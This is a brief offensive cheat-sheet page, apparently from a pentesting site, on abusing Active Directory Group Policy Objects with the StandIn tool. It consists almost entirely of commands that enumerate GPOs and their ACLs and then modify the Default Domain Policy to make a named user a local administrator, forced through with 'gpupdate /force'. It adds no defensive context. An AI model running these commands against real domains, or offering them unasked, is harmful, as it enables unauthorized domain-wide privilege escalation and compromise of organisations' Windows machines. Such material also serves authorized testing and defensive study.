>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Active Directory / StandIn - GPO Abuse

StandIn - GPO Abuse

Active Directory AD Attacks windows

List available GPOs

.\StandIn.exe --gpo

Inspect GPO ACLs

.\StandIn.exe --gpo --filter "Default Domain Policy" --acl

Add current user to local Administrators via GPO

.\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin charlotte
gpupdate /force

Reference: https://github.com/FuzzySecurity/StandIn

Alternative

https://github.com/FSecureLABS/SharpGPOAbuse